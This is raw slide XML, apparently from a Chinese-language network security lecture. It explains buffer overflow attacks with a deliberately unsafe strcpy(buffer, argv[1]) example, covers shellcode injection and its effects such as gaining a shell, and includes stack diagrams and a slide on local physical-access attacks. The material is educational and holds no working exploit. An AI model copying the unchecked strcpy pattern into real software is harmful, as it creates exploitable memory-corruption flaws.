                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>存储在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>Stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>buffer,argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>[1]); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>	  return 0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>} </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="圆角矩形标注 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4714876" y="2285992"/>
            <a:ext cx="3286148" cy="1643074"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -75026"/>
              <a:gd name="adj2" fmla="val 241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en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>Strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>不匹配</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>argv[1]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>长度，可能导致溢出</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="楷体_GB2312" pitchFamily="49"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219</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9581609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zh-CN" altLang="en-US"/>
              <a:t>旁侧偷看</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>未上锁的终端</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>被写下的口令</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>拔掉机器</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>本地登录</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93188" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在本地</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93186" name="灯片编号占位符 1"/>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9CD28D82-1C3F-4A17-AE01-89B9498710BA}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12650551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dirty="0"/>
              <a:t>利用目标程序的缓冲区溢出漏洞，向缓冲区写超其长度的内容，造成缓冲区溢出</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>破坏程序的堆栈</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>超出部分写入（覆盖）其他缓冲区，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据、下一条指令指针，函数返回地址或是其他程序输出内容，</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使程序转而执行其它指令</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>目标系统指令</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>恶意代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：通过缓冲区溢出注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="290818" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>缓冲区溢出攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FEF4E944-C727-464C-85A7-E70A1F27AC09}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>220</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="109873400"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:pull/>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Rot="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>UNIX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>平台上可获得一个交互式的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>平台上可上载并</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>执行任何代码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>溢出漏洞发掘需较高技巧和知识背景</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一旦有人编写出溢出代码，则用起来非常简单</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>与其他的攻击类型相比</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>不需要太多的先决条件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>杀伤力很强</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>技术性强</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>穿透防火墙</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="159746" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>缓冲区溢出攻击危害性</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221</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>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rrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>操作系统给每个进程分配独立虚拟地址空间</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>代码区、数据区和堆栈区。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123906"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a:t>缓冲区溢出攻击的内存模型</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="组合 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="827584" y="4070350"/>
            <a:ext cx="3311525" cy="2095500"/>
            <a:chOff x="827584" y="4070350"/>
            <a:chExt cx="3311525" cy="2095500"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25604" name="Rectangle 4"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1907084" y="42227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代码段</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25605" name="Rectangle 5"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1907084" y="48704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数据段</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25606" name="Rectangle 6"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1907084" y="55181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堆栈段</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25607" name="Text Box 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="827584" y="4070350"/>
              <a:ext cx="865187" cy="396875"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1"/>
                <a:t>CS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                  <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
                </a:rPr>
                <a:t></a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25608" name="Text Box 8"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="827584" y="4718050"/>
              <a:ext cx="865187" cy="396875"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1"/>
                <a:t>DS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                  <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
                </a:rPr>
                <a:t></a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25609" name="Text Box 9"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="827584" y="5373688"/>
              <a:ext cx="865187" cy="396875"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1"/>
                <a:t>SS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                  <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
                </a:rPr>
                <a:t></a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="3861048"/>
            <a:ext cx="4248472" cy="26407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eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>CS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：程序机器码和只读数据。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：程序静态数据。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：动态数据。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>堆和堆栈都可以被利用来进行溢出</a:t>
            </a:r>
          </a:p>
          <a:p>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222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a:t>堆栈示意图</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31747" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3562350" y="1428750"/>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48" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3562350" y="1933575"/>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a:t>512</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31749" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3562350" y="2436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50" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3563938" y="3444875"/>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a:t>……</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31751" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3562350" y="294163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52" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5508625" y="1428750"/>
            <a:ext cx="2017713" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>栈顶</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ESP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31753" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5508625" y="2941638"/>
            <a:ext cx="2090738" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>栈底</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>EBP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31754" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1835150" y="1428750"/>
            <a:ext cx="1439863" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>内存低端</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
